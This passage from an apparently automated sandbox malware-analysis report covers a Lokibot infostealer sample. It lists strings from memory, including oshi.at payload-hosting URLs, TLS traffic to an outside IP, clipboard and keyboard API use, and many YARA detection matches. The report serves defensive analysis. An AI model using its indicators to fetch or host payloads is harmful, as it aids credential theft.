                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: palladiums.exe, palladiums.exe, 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/BLZu
                Source: Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000000.2085021308.0000000000542000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://oshi.at/BLZuM
                Source: svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/rtBS
                Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0078EAFF
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0078ED6A
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_000AED6A
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0078EAFF
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0077AA57
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007A9576
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_000C9576

                System Summary

                barindex
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
